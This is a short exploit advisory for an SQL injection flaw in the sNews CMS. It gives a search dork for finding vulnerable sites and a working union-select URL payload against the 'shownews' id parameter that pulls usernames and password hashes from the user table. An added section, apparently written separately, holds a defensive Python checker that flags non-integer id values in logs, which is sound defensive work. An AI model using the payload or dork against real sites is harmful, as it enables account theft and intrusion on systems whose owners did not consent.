Title: CMS snews SQL Injection Vulnerability
Author: onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keywords: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************
SQL poc:
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
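
A defensive check for the request shape shown above, as an added example (not code from the original advisory or from sNews): it flags any act=shownews request whose id is not a plain integer, and lists the SQL keywords found after repeated URL-decoding and removal of /**/ comments. The sample requests other than the advisory's own, the function names and the 10-digit limit are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed request targets as they would appear in a web access log.
# The second one is the example URL from the advisory; the rest are made up.
SAMPLE_REQUESTS = [
    "/snews/snews.php?act=shownews&id=23",
    "/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,"
    "concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user"
    "/**/where/**/id%20like%201/*",
    "/snews/snews.php?act=shownews&id=23%2520UnIoN%2520SeLeCt%25201",
    "/index.html",
]

SQL_TOKENS = re.compile(r"\b(union|select|from|where|concat|char|like)\b", re.I)


def normalize(value):
    """Undo layered URL-encoding and comment-as-whitespace tricks."""
    prev = None
    while prev != value:                        # decode until nothing changes
        prev, value = value, unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value)    # closed /**/ comments
    value = re.sub(r"/\*.*$", " ", value)       # trailing unterminated /*
    return re.sub(r"\s+", " ", value).strip().lower()


def check_request(target):
    """Return (verdict, sql_tokens) for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/snews.php"):
        return ("ignore", [])
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("act") != ["shownews"]:
        return ("ignore", [])
    ids = params.get("id", [])
    # Allowlist: exactly one id, digits only (assumed limit of 10 digits).
    if len(ids) == 1 and re.fullmatch(r"[0-9]{1,10}", ids[0]):
        return ("ok", [])
    found = {t.lower() for v in ids for t in SQL_TOKENS.findall(normalize(v))}
    return ("alert", sorted(found))             # tokens are triage context


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(check_request(req), req[:60])
```

The integer allowlist is what decides the verdict; the keyword list only helps an analyst triage the alert, so an obfuscation that hides every keyword still produces an alert.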
Thanks:
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell

indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*